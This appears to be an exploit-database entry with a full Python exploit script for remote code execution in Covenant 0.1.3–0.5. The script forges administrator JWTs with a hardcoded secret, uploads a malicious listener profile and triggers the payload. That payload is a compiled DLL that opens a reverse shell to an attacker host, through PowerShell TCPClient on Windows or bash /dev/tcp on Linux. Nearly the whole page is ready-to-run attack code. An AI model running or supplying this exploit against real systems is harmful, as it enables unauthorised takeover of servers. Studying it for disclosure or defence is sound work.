Headline
Covenant 0.5 Remote Code Execution
Covenant versions 0.1.3 through 0.5 suffer from a remote code execution vulnerability.
# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)# Exploit Author: xThaz# Author website: https://xthaz.fr/# Date: 2022-09-11# Vendor Homepage: https://cobbr.io/Covenant.html# Software Link: https://github.com/cobbr/Covenant# Version: v0.1.3 - v0.5# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker# Vulnerability## Discoverer: coastal## Date: 2020-07-13## Discoverer website: https://blog.null.farm## References:## - https://blog.null.farm/hunting-the-hunters## - https://github.com/Zeop-CyberSec/covenant_rce/blob/master/covenant_jwt_rce.rb# !/usr/bin/env python3# encoding: utf-8import jwt # pip3 install PyJWTimport jsonimport warningsimport base64import reimport randomimport argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarningfrom Crypto.Hash import HMAC, SHA256 # pip3 install pycryptodomefrom Crypto.Util.Padding import padfrom Crypto.Cipher import AESfrom requests import request # pip3 install requestsfrom subprocess import runfrom pwn import remote, context # pip3 install pwntoolsfrom os import remove, urandomfrom shutil import whichfrom urllib.parse import urlparsefrom pathlib import Pathfrom time import timedef check_requirements(): if which("mcs") is None: print("Please install the mono framework in order to compile the payload.") print("https://www.mono-project.com/download/stable/") exit(-1)def random_hex(length): alphabet = "0123456789abcdef" return ''.join(random.choice(alphabet) for _ in range(length))def request_api(method, token, route, body=""): warnings.simplefilter('ignore', InsecureRequestWarning) return request( method, f"{args.target}/api/{route}", json=body, headers={ "Authorization": f"Bearer {token}", "Content-Type": "application/json" }, verify=False )def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"): secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm\'q%1ugAvfq6rC' payload_data = { 
"sub": username, "jti": "925f74ca-fc8c-27c6-24be-566b11ab6585", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": userid, "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": [ "User", "Administrator" ], "exp": int(time()) + 360, "iss": "Covenant", "aud": "Covenant" } token = jwt.encode(payload_data, secret_key, algorithm='HS256') return tokendef get_id_admin(token, json_roles): id_admin = "" for role in json_roles: if role["name"] == "Administrator": id_admin = role["id"] print(f"\t[*] Found the admin group id : {id_admin}") break else: print("\t[!] Did not found admin group id, quitting !") exit(-1) id_admin_user = "" json_users_roles = request_api("get", token, f"users/roles").json() for user_role in json_users_roles: if user_role["roleId"] == id_admin: id_admin_user = user_role["userId"] print(f"\t[*] Found the admin user id : {id_admin_user}") break else: print("\t[!] Did not found admin id, quitting !") exit(-1) json_users = request_api("get", token, f"users").json() for user in json_users: if user["id"] == id_admin_user: username_admin = user["userName"] print(f"\t[*] Found the admin username : {username_admin}") return username_admin, id_admin_user else: print("\t[!] 
Did not found admin username, quitting !") exit(-1)def compile_payload(): if args.os == "windows": payload = '"powershell.exe", "-nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'' + args.lhost + '\',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\""' else: payload = '"bash", "-c \\"exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1\\""' dll = """using System;using System.Reflection;namespace ExampleDLL{ public class Class1{ public Class1(){ } public void Main(string[] args){ System.Diagnostics.Process.Start(""" + payload + """); } }}""" temp_dll_path = f"/tmp/{random_hex(8)}" Path(f"{temp_dll_path}.cs").write_bytes(dll.encode()) print(f"\t[*] Writing payload in {temp_dll_path}.cs") compilo_path = which("mcs") compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"]) if compilation.returncode: print("\t[!] 
Error when compiling DLL, quitting !") exit(-1) print(f"\t[*] Successfully compiled the DLL in {temp_dll_path}.dll") dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode() remove(temp_dll_path + ".cs") remove(temp_dll_path + ".dll") print(f"\t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll") return dll_encodeddef generate_wrapper(dll_encoded): wrapper = """public static class MessageTransform { public static string Transform(byte[] bytes) { try { string assemblyBase64 = \"""" + dll_encoded + """\"; var assemblyBytes = System.Convert.FromBase64String(assemblyBase64); var assembly = System.Reflection.Assembly.Load(assemblyBytes); foreach (var type in assembly.GetTypes()) { object instance = System.Activator.CreateInstance(type); object[] args = new object[] { new string[] { \"\" } }; try { type.GetMethod(\"Main\").Invoke(instance, args); } catch {} } } catch {} return System.Convert.ToBase64String(bytes); } public static byte[] Invert(string str) { return System.Convert.FromBase64String(str); }}""" return wrapperdef upload_profile(token, wrapper): body = { 'httpUrls': [ '/en-us/index.html', '/en-us/docs.html', '/en-us/test.html' ], 'httpRequestHeaders': [ {'name': 'User-Agent', 'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 ' 'Safari/537.36'}, {'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'} ], 'httpResponseHeaders': [ {'name': 'Server', 'value': 'Microsoft-IIS/7.5'} ], 'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73', 'httpGetResponse': '{DATA}', 'httpPostResponse': '{DATA}', 'id': 0, 'name': random_hex(8), 'description': '', 'type': 'HTTP', 'messageTransform': wrapper } response = request_api("post", token, "profiles/http", body) if not response.ok: print("\t[!] 
Failed to create the listener profile, quitting !") exit(-1) else: profile_id = response.json().get('id') print(f"\t[*] Profile created with id {profile_id}") print("\t[*] Successfully created the listener profile") return profile_iddef generate_valid_listener_port(impersonate_token, tries=0): if tries >= 10: print("\t[!] Tried 10 times to generate a listener port but failed, quitting !") exit(-1) port = random.randint(8000, 8250) # TO BE EDITED WITH YOUR TARGET LISTENER PORT listeners = request_api("get", impersonate_token, "listeners").json() port_used = [] for listener in listeners: port_used.append(listener["bindPort"]) if port in port_used: print(f"\t[!] Port {port} is already taken by another listener, retrying !") generate_valid_listener_port(impersonate_token, tries + 1) else: print(f"\t[*] Port {port} seems free") return portdef get_id_listener_type(impersonate_token, listener_name): response = request_api("get", impersonate_token, "listeners/types") if not response.ok: print("\t[!] Failed to get the listener type, quitting !") exit(-1) else: for listener_type in response.json(): if listener_type["name"] == listener_name: print(f'\t[*] Found id {listener_type["id"]} for listener {listener_name}') return listener_type["id"]def generate_listener(impersonate_token, profile_id): listener_port = generate_valid_listener_port(impersonate_token) listener_name = random_hex(8) data = { 'useSSL': False, 'urls': [ f"http://0.0.0.0:{listener_port}" ], 'id': 0, 'name': listener_name, 'bindAddress': "0.0.0.0", 'bindPort': listener_port, 'connectAddresses': [ "0.0.0.0" ], 'connectPort': listener_port, 'profileId': profile_id, 'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"), 'status': 'Active' } response = request_api("post", impersonate_token, "listeners/http", data) if not response.ok: print("\t[!] 
Failed to create the listener, quitting !") exit(-1) else: print("\t[*] Successfully created the listener") listener_id = response.json().get("id") return listener_id, listener_portdef create_grunt(impersonate_token, data): stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"] if stager_code == "": stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"] if stager_code == "": print("\t[!] Failed to create the grunt payload, quitting !") exit(-1) print("\t[*] Successfully created the grunt payload") return stager_codedef get_grunt_config(impersonate_token, listener_id): data = { 'id': 0, 'listenerId': listener_id, 'implantTemplateId': 1, 'name': 'Binary', 'description': 'Uses a generated .NET Framework binary to launch a Grunt.', 'type': 'binary', 'dotNetVersion': 'Net35', 'runtimeIdentifier': 'win_x64', 'validateCert': True, 'useCertPinning': True, 'smbPipeName': 'string', 'delay': 0, 'jitterPercent': 0, 'connectAttempts': 0, 'launcherString': 'GruntHTTP.exe', 'outputKind': 'consoleApplication', 'compressStager': False } stager_code = create_grunt(impersonate_token, data) aes_key = re.search(r'FromBase64String\(@\"(.[A-Za-z0-9+\/=]{40,50}?)\"\);', stager_code) guid_prefix = re.search(r'aGUID = @"(.{10}[0-9a-f]?)";', stager_code) if not aes_key or not guid_prefix: print("\t[!] 
Failed to retrieve the grunt configuration, quitting !") exit(-1) aes_key = aes_key.group(1) guid_prefix = guid_prefix.group(1) print(f"\t[*] Found the grunt configuration {[aes_key, guid_prefix]}") return aes_key, guid_prefixdef aes256_cbc_encrypt(key, message): iv_bytes = urandom(16) key_decoded = base64.b64decode(key) encoded_message = pad(message.encode(), 16) cipher = AES.new(key_decoded, AES.MODE_CBC, iv_bytes) encrypted = cipher.encrypt(encoded_message) hmac = HMAC.new(key_decoded, digestmod=SHA256) signature = hmac.update(encrypted).digest() return encrypted, iv_bytes, signaturedef trigger_exploit(listener_port, aes_key, guid): message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>" ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message) data = { "GUID": guid, "Type": 0, "Meta": '', "IV": base64.b64encode(iv).decode(), "EncryptedMessage": base64.b64encode(ciphered).decode(), "HMAC": base64.b64encode(signature).decode() } json_data = json.dumps(data).encode("utf-8") payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73" if send_exploit(listener_port, "Cookie", guid, payload): print("\t[*] Exploit succeeded, check listener") else : print("\t[!] Exploit failed, retrying") if send_exploit(listener_port, "Cookies", guid, payload): print("\t[*] Exploit succeeded, check listener") else: print("\t[!] 
Exploit failed, quitting")def send_exploit(listener_port, header_cookie, guid, payload): context.log_level = 'error' request = f"""POST /en-us/test.html HTTP/1.1\rHost: {IP_TARGET}:{listener_port}\rUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\r{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750\rContent-Type: application/x-www-form-urlencoded\rContent-Length: {len(payload)}\r\r{payload}""".encode() sock = remote(IP_TARGET, listener_port) sock.sendline(request) response = sock.recv().decode() sock.close() if "HTTP/1.1 200 OK" in response: return True else: return Falseif __name__ == "__main__": check_requirements() parser = argparse.ArgumentParser() parser.add_argument("target", help="URL where the Covenant is hosted, example : https://127.0.0.1:7443") parser.add_argument("os", help="Operating System of the target", choices=["windows", "linux"]) parser.add_argument("lhost", help="IP of the machine that will receive the reverse shell") parser.add_argument("lport", help="Port of the machine that will receive the reverse shell") args = parser.parse_args() IP_TARGET = urlparse(args.target).hostname print("[*] Getting the admin info") sacrificial_token = craft_jwt("xThaz") roles = request_api("get", sacrificial_token, "roles").json() admin_username, admin_id = get_id_admin(sacrificial_token, roles) impersonate_token = craft_jwt(admin_username, admin_id) print(f"\t[*] Impersonated {[admin_username]} with the id {[admin_id]}") print("[*] Generating payload") dll_encoded = compile_payload() wrapper = generate_wrapper(dll_encoded) print("[*] Uploading malicious listener profile") profile_id = upload_profile(impersonate_token, wrapper) print("[*] Generating listener") listener_id, listener_port = generate_listener(impersonate_token, profile_id) print("[*] Triggering the exploit") aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id) trigger_exploit(listener_port, aes_key, 
f"{guid_prefix}{random_hex(10)}")